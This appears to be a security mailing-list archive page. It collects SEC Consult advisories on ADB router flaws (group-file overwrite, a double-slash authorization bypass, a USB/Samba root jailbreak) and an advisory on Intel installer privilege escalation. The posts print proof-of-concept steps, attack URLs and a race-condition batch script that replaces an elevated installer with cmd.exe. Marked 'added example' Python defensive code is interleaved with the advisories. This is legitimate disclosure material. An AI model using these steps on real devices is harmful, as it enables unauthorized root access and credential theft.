SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
  title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13110
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-07-11
 by: Stefan Viehböck (Office Vienna)
 Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.

Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate their privileges.

Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.

Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.


Proof of concept:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local Linux groups "remoteaccess" or "localaccess" (in
/etc/group), which define access to Telnet or SSH on the ADB devices.

It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.
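The root cause above is a user-supplied group name reaching /etc/group without being checked against the groups that already gate shell access. The following is an added example, not ADB's firmware code, of the two checks a defender would want: a validator that a storage-user form should run before touching /etc/group, and an audit that spots an access-control group whose entry looks like a web-GUI storage group (the "localaccess:Storage Group:5001:" shape the advisory shows). The sample /etc/group content, the GID threshold of 5000 and the POSIX name rule are assumptions made for the example.

```python
"""Group-name validation and /etc/group audit (added example, not ADB code)."""
import re

# Groups that gate CLI/shell access on the affected devices (named in the
# advisory) plus the root group; an ISP-specific list would extend this set.
PROTECTED_GROUPS = {"root", "remoteaccess", "localaccess"}

# Constructed sample /etc/group resembling a device with one storage group.
SAMPLE_ETC_GROUP = """\
root:x:0:admin
localaccess:x:100:admin
remoteaccess:x:101:
storage1:Storage Group:5001:admin
"""

# Constructed sample after the overwrite the advisory describes.
TAMPERED_ETC_GROUP = """\
root:x:0:admin
localaccess:Storage Group:5001:admin
remoteaccess:x:101:
"""

# Assumption: POSIX-portable name, no ':' or whitespace, max 32 characters,
# first character not '-' (mirrors the rules groupadd enforces).
NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}$")

# Assumption: GIDs the web GUI hands out to storage groups start at 5000.
STORAGE_GID_MIN = 5000


def parse_group_file(text):
    """Return a list of (name, password_field, gid) from /etc/group text."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue  # malformed line; an audit could also flag this
        gid = int(fields[2]) if fields[2].isdigit() else None
        entries.append((fields[0], fields[1], gid))
    return entries


def validate_new_group_name(name, etc_group_text):
    """Return (ok, reason). ok is True only if the name is safe to add."""
    if not NAME_RE.match(name):
        return False, "invalid characters or length"
    if name in PROTECTED_GROUPS:
        return False, "name reserved for system access control"
    if name in {n for n, _, _ in parse_group_file(etc_group_text)}:
        return False, "group already exists"
    return True, "ok"


def audit_protected_groups(etc_group_text):
    """Return protected group names whose entry looks like a storage group,
    i.e. whose password field reads 'Storage Group' or whose GID falls in
    the storage range; either means the real access group was replaced."""
    findings = []
    for name, pw_field, gid in parse_group_file(etc_group_text):
        if name not in PROTECTED_GROUPS:
            continue
        if pw_field == "Storage Group" or (gid is not None and gid >= STORAGE_GID_MIN):
            findings.append(name)
    return findings


if __name__ == "__main__":
    print(validate_new_group_name("localaccess", SAMPLE_ETC_GROUP))
    print(audit_protected_groups(TAMPERED_ETC_GROUP))
```

The validator rejects names on three independent grounds (syntax, reserved name, collision) so that a later change to the reserved list does not silently reopen the collision case; the audit is cheap enough to run from a firmware health check on every boot.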

The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
 http://$IP/ui/dboard/storage/storageusers?backto=storage

   This will generate the following new group in /etc/group. The original
   "localaccess" group will be overwritten.

   localaccess:Storage Group:5001:

b) Then delete this group again via the web GUI; the entry will be removed
   from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and
   add your user account (e.g. admin) wh

SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
  title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13109
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-28
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===



Business recommendation:

By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI; further subsequent layers/paths (sub menus) could not be accessed during
testing, but further exploitation can't be ruled out entirely.


Proof of concept:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.
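The bypass works because the permission check compares the request path as written, so "management//telnetserver" and "management/telnetserver" are different strings to the check but the same resource to the router. The following is an added example (not ADB's web GUI code) that puts the vulnerable comparison next to a hardened one which canonicalises the path before consulting the policy. The blocklist, the documentation address 192.0.2.1 standing in for $IP, and the choice to deny everything beneath a blocked entry are assumptions made for the example; the last one goes beyond the advisory, which only reports that sub menus were not reachable in testing.

```python
"""Path canonicalisation before authorisation (added example, not ADB code)."""
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed ISP policy: web GUI paths a standard user may not open.
FORBIDDEN_PATHS = {
    "/ui/dboard/settings/management/telnetserver",
    "/ui/dboard/settings/proxy",
}


def naive_is_allowed(url):
    """Vulnerable pattern: compare the raw request path with the blocklist.
    Any alternate spelling of the same path ('//', '.', '%2F') slips past."""
    return urlsplit(url).path not in FORBIDDEN_PATHS


def canonical_path(url):
    """Return one canonical spelling of the request path: percent-decoding
    applied once, repeated slashes collapsed, '.' and '..' resolved, trailing
    slash dropped, and a path that climbs above '/' clamped to '/'.
    The leading slashes are stripped first because POSIX (and normpath)
    treat a leading '//' as significant."""
    decoded = unquote(urlsplit(url).path)
    return posixpath.normpath("/" + decoded.lstrip("/"))


def hardened_is_allowed(url):
    """Deny if the canonical path is a forbidden entry or lies beneath one."""
    path = canonical_path(url)
    for forbidden in FORBIDDEN_PATHS:
        if path == forbidden or path.startswith(forbidden + "/"):
            return False
    return True


if __name__ == "__main__":
    for u in ("http://192.0.2.1/ui/dboard/settings/management/telnetserver",
              "http://192.0.2.1/ui/dboard/settings/management//telnetserver"):
        print(u, "naive:", naive_is_allowed(u), "hardened:", hardened_is_allowed(u))
```

The same canonical form should be used for routing and for the permission decision; if the router normalises but the authoriser does not (or vice versa), the two disagree and an attacker only needs a spelling that each side interprets differently.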


Vulnerable / tested versions:
---
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_

SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
  title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13108
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-09
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===



Business recommendation:

By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation problem and
a samba configuration file parsing problem, which together make it possible to
access the root file system of the device with root access rights via a
manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.
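Two checks follow from the description above: the "wide links = no" setting has to actually be in effect for every exported share, and a file-sharing front end that runs as root must confirm that a requested path still resolves inside the share before touching it. The following is an added example, not ADB's firmware or Samba's code, that implements both. The smb.conf content is constructed for the example; the effective-value rule (a share-level "wide links" overrides [global], default "no") matches Samba's documented semantics, and the symlink demonstration builds its "USB drive" in a temporary directory.

```python
"""smb.conf audit and share containment check (added example, not ADB code)."""
import configparser
import os
import tempfile

# Constructed smb.conf: one share inherits the global protection, one turns it off.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   wide links = no

[usb_ok]
   path = /mnt/usb1
   read only = no

[usb_bad]
   path = /mnt/usb2
   wide links = yes
"""


def _as_bool(value):
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return the names of shares whose effective 'wide links' is enabled.
    A share-level value overrides [global]; absent everywhere, it is 'no'."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    global_wide = _as_bool(cp.get("global", "wide links", fallback="no"))
    exposed = []
    for share in cp.sections():
        if share == "global":
            continue
        value = cp.get(share, "wide links", fallback=None)
        effective = _as_bool(value) if value is not None else global_wide
        if effective:
            exposed.append(share)
    return exposed


def path_escapes_share(share_root, requested):
    """True if share_root/requested resolves, through symlinks or '..', to a
    location outside share_root. This is the containment check a root-running
    file service must make before reading or writing the target."""
    root = os.path.realpath(share_root)
    target = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    return os.path.commonpath([root, target]) != root


def demo_symlink_escape():
    """Build a throwaway 'USB drive' holding a normal file and a symlink to '/'
    and return the check's verdict for three requests (benign, via symlink,
    via '..'); expected (False, True, True)."""
    with tempfile.TemporaryDirectory() as usb:
        with open(os.path.join(usb, "photo.jpg"), "wb") as fh:
            fh.write(b"constructed sample file")
        os.symlink("/", os.path.join(usb, "rootfs"))
        return (
            path_escapes_share(usb, "photo.jpg"),
            path_escapes_share(usb, "rootfs/etc/passwd"),
            path_escapes_share(usb, "../../etc/passwd"),
        )


if __name__ == "__main__":
    print("shares with wide links enabled:", audit_smb_conf(SAMPLE_SMB_CONF))
    print("escape verdicts:", demo_symlink_escape())
```

The containment check is only as good as the moment it runs: resolving the path and then opening it by name leaves a window in which the link can be swapped, so a production implementation would open the resolved file and re-verify on the open handle, or run the service without root so that an escape reaches nothing the attacker could not already read.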


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite p

[CVE-2018-3667, CVE-2018-3668] Escalation of privilege via executable installer of Intel Processor Diagnostic Tool

2018-07-04 Thread Stefan Kanthak
Hi @ll,

the executable installers of Intel's Processor Diagnostic Tool
(IPDT) before v4.1.0.27 have three vulnerabilities^Wbeginner's
errors which all allow arbitrary code execution with escalation
of privilege, plus a fourth which allows denial of service.

Intel published advisory SA-00140

on 2018-06-27 and updated installers on 2018-05-18.


The vulnerabilities can be exploited in standard installations
of Windows where the user^WUAC-"protected administrator" account
created during Windows setup is used, without elevation.
This precondition holds for the majority of Windows installations:
according to Microsoft's own security intelligence reports
, about 1/2 to 3/4 of the
about 600 million Windows installations which send telemetry data
have only ONE active user account.


#1 Denial of service through insecure file permissions
==

   The downloadable executable installer (really: executable
   self-extractor built with WinZIP) IPDT_Installer_4.1.0.24.exe
   creates a subdirectory with random name in %TEMP%, copies
   itself into this subdirectory and then executes its copy.

   The subdirectory inherits the NTFS ACLs from its parent
   %TEMP%, and so does the copy of the executable self-extractor.

   For this well-known and well-documented vulnerability see
    and
    plus
   


   Proof of concept/demonstration:
   ~~~

   1. download IPDT_Installer_4.1.0.24.exe (quite some clueless
  copycats still offer it, violating Intel's copyright;
  )
  and save it in your "Downloads" directory;

   2. add the NTFS access control list entry (D;OIIO;WP;;;WD)
  meaning "deny execution of files in this directory for
  everyone, inheritable to files in all subdirectories"
  to the (user's) %TEMP% directory.

   3. execute IPDT_Installer_4.1.0.24.exe: notice the complete
  failure of the executable installer^Wself-extractor,
  WITHOUT error message!


#2 Escalation of privilege through insecure file permissions


   Although the (copy of the) executable self-extractor runs with
   administrative privileges (its embedded "application manifest"
   specifies 'requireAdministrator'), it extracts its payload, the
   REAL installers setup.exe and setup64.exe, plus the batch script
   setup.bat, UNPROTECTED into the user's %TEMP% directory, CD's
   into %TEMP% and finally executes the extracted batch script
   %TEMP%\setup.bat:

   --- setup.bat ---
   echo off

   ver | findstr 6.1.7600
   if %errorlevel%==0 goto WinUnsup

   ver | findstr 6.0.6001
   if %errorlevel%==0 goto WinUnsup

   if "%programfiles(x86)%XXX"=="XXX" goto 32BIT

   :64BIT
   setup64.exe
   goto END

   :32BIT
   setup.exe
   goto END

   :WinUnsup
   echo Intel Processor Diagnostic Tool cannot be installed on this Operating System
   echo Please go to Online support page to view list of supported Oerating Systems

   pause

   :END
   exit 0
   --- EOF ---

   The extracted files inherit the NTFS ACLs from their parent
   %TEMP%, allowing "full access" for the unprivileged (owning)
   user, who can replace/overwrite the files between their creation
   and execution.

   Since the files are executed with administrative privileges,
   this vulnerability results in arbitrary code execution with
   escalation of privilege.


   Proof of concept/demonstration:
   ~~~

   1. create the following batch script in an arbitrary directory:

  --- IPDT.CMD ---
  :LOOP1
  @If Not Exist "%TEMP%\setup.exe" Goto :LOOP1

  Echo >"%TEMP%\setup.bat" WhoAMI.exe /all
  Echo >>"%TEMP%\setup.bat" Pause

  :LOOP2
  @If Not Exist "%TEMP%\setup64.exe" Goto :LOOP2

  Copy /Y %COMSPEC% "%TEMP%\setup.exe"

  :LOOP3
  @Copy %COMSPEC% "%TEMP%\setup64.exe"
  @If ERRORLEVEL 1 Goto :LOOP3
  --- EOF ---

   NOTE: the batch script needs to win a race (which it almost
 always will, due to the size of the files extracted).

   2. execute the batch script per double-click;

   3. execute IPDT_Installer_4.1.0.24.exe per double-click: notice
  the command processor started instead one of the executable
  installers, running with administrative privileges.


#3 Escalation of privilege through unsafe search path
=

   In Windows Vista and newer versions, the current working
   directory can be removed from the executable search path:
   

   The batch script setup.bat calls setup.exe